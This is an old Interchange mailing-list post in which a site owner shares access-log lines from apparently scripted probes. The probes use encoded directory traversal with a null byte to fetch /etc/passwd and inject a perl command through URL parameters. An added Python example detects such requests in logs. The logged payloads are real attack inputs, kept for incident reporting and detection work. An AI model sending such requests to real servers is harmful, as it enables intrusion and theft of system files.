[ic] Hack attempt on IC 4.8.6

Ryan Grace ryan at ryangrace.com
Fri Nov 14 22:35:13 EST 2003


From what I can tell this person was unsuccessful.  My IC and Apache logs show multiple attempts to grab my passwd file by inserting many ../../../../../'s in the URLs and attempts to execute arbitrary perl code by manipulating URL parameters.  Here are a few lines:

66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id=%2e%2e%2f%
2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2
f%2e%2e%2fetc%2fpasswd%00 HTTP/1.0" 403 109 "-" "Mozilla/4.0 (compatible; MSIE 4
.0; Windows 95)"
66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id=foo%3bfoo%
7cperl%20%2de%20%27print%22roo%22%3bprint%22t%3a%22%27%26%26foo%00 HTTP/1.0" 403
 82 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id= HTTP/1.0"
 200 8162 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/index.html?id= HTTP/1.0"
 200 8162 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/customerservice?mv_sessi
on_id=6MZFj58R&mv_pc=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2
e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%
2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00&spg=customerservice HTT
P/1.0" 302 39 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/customerservice?mv_sessi
on_id=6MZFj58R&mv_pc=1&spg=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2
f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%
2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.0" 302 39
"-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/customerservice?mv_sessi
on_id=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2
e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%
2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00&mv_pc=1&spg=customerservice HTTP/1.0"
403 109 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"

Sorry for the weird wrapping.  The log goes on and on like this.

Has anyone else seen this kind of attempt?  It looks like a script judging by the rapidity of the accesses.

Ryan
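
Added example, not part of the original post: a small detector for the probes in the log above. It rejoins hard-wrapped access-log records, percent-decodes each query parameter, and flags directory traversal, the trailing null byte, and shell metacharacters. The sample lines, the `/shop` paths and the 192.0.2.10 address are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Start of an Apache combined-log record: host ident user [timestamp]
RECORD_START = re.compile(r"^\S+ \S+ \S+ \[")
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')

# Patterns applied to the percent-DECODED parameter value.
CHECKS = {
    "traversal": re.compile(r"\.\./"),
    "null_byte": re.compile(r"\x00"),
    "shell_meta": re.compile(r"[;|&`]"),
}

def unwrap(lines):
    """Rejoin records that were hard-wrapped at a fixed column."""
    records = []
    for line in lines:
        if RECORD_START.match(line) or not records:
            records.append(line)
        else:
            records[-1] += line  # the wrap added no characters, so concatenate
    return records

def scan(lines):
    """Return (host, status, parameter, findings) for each suspicious parameter."""
    hits = []
    for record in unwrap(lines):
        m = LOG_RE.match(record)
        if not m:
            continue
        host, target, status = m.groups()
        # parse_qsl splits on the raw '&' first, then decodes %xx in each value
        for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            found = sorted(n for n, rx in CHECKS.items() if rx.search(value))
            if found:
                hits.append((host, int(status), key, found))
    return hits

# Constructed sample lines modelled on the log above (shortened, documentation IP).
SAMPLE = [
    '192.0.2.10 - - [13/Nov/2003:07:32:53 -0500] "GET /shop/index.html?id=%2e%2e%2f%2e%',
    '2e%2fetc%2fpasswd%00 HTTP/1.0" 403 109 "-" "ua"',
    '192.0.2.10 - - [13/Nov/2003:07:32:53 -0500] "GET /shop/index.html?id=foo%3bfoo%7cperl HTTP/1.0" 403 82 "-" "ua"',
    '192.0.2.10 - - [13/Nov/2003:07:32:54 -0500] "GET /shop/index.html?id= HTTP/1.0" 200 8162 "-" "ua"',
    '192.0.2.10 - - [13/Nov/2003:07:32:54 -0500] "GET /shop/cs?mv_pc=1&spg=%2e%2e%2fetc%2fpasswd%00 HTTP/1.0" 302 39 "-" "ua"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The status field in each hit separates probes the server refused (403) from ones it answered with another status, such as the 302 responses in the log above.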

